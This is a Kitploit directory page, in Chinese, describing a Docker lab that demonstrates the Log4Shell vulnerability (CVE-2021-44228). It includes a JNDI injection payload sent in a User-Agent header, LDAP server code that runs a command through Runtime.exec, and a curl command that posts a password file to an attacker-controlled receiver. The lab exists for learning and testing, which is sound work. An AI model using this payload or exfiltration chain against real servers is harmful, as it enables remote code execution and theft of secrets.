Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228-docker-example | Kitploit
工具/GitHubGitHub/dicanio/cve-2021-44228-docker-example
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露学习与教育实验室与实践
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44228-docker-example

这是一个关于 CVE-2021-44228 的简单演示,演示如何将数据从易受攻击的服务器传输到由攻击者控制的 Web 服务。所有涉及的组件均通过 Docker 运行。

组件

vulnerable-server

这是一个充当受害者的标准 Java 服务器。它运行:

  • Java 8u111
  • Web 应用程序(Spring Boot 2.6.1)
  • Log4J

使用此配置时,该服务器是易受攻击的。

其他信息:

  • 位于 /logging 的端点(GET)将使用 Log4J 记录用户代理
  • /foo/passwords.txt 存在(攻击者的目标)

passwords.txt 的内容:

root@kitploit:~
my secret

malicious-receiver

这是一个充当攻击者数据收集器的标准 Java 服务器。它运行:

  • Java 17
  • Web 应用程序(Spring Boot 2.6.1)

其他信息:

  • 位于 receiver 的端点(POST)将记录请求体

malicious-ldap

这是一个由 rogue-jndi 提供支持的 LDAP 服务器。其 ExportJava 类已被修改,使得通过 -c 标志传递的命令得以执行。

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

当易受攻击的服务器请求时,它将响应一个类,该类在实例化时会运行以下命令:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

这实际上会将 /foo/passwords.txt 的内容提交到恶意接收器预先准备好的端点。

使用方法

  1. 通过运行以下命令设置 Docker 镜像:
    root@kitploit:~
    ./build.sh
    
  2. 通过运行以下命令启动组件容器:
    root@kitploit:~
    ./start.sh
    
  3. 通过运行以下命令触发漏洞:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. 通过运行以下命令检查恶意接收器组件的日志输出:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    日志中应包含服务器 passwords.txt 文件的内容。
  5. 通过运行以下命令停止组件容器:
    root@kitploit:~
    ./stop.sh
    
下载工具